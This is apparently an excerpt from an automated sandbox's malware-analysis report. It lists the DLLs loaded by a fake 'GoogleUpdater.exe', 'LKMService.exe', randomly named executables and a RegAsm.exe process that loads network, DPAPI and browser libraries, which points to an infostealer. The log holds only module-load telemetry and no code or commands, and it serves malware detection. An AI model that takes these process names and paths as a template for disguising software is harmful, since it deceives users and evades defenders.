Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Section loaded: version.dll
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Section loaded: version.dll
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mozglue.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wsock32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appresolver.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: slc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sppc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: pcacli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\userEHJDHJKFIE.exe	Section loaded: mscoree.dll
Source: C:\Users\userEHJDHJKFIE.exe	Section loaded: apphelp.dll
Source: C:\Users\userEHJDHJKFIE.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\userEHJDHJKFIE.exe	Section loaded: version.dll
Source: C:\Users\userEHJDHJKFIE.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\userEHJDHJKFIE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\userBAKKEGCAAE.exe	Section loaded: mscoree.dll
Source: C:\Users\userBAKKEGCAAE.exe	Section loaded: apphelp.dll
Source: C:\Users\userBAKKEGCAAE.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\userBAKKEGCAAE.exe	Section loaded: version.dll
Source: C:\Users\userBAKKEGCAAE.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\userBAKKEGCAAE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\userBAKKEGCAAE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mozglue.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wsock32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appresolver.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: slc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sppc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: pcacli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntshrui.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: linkinfo.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
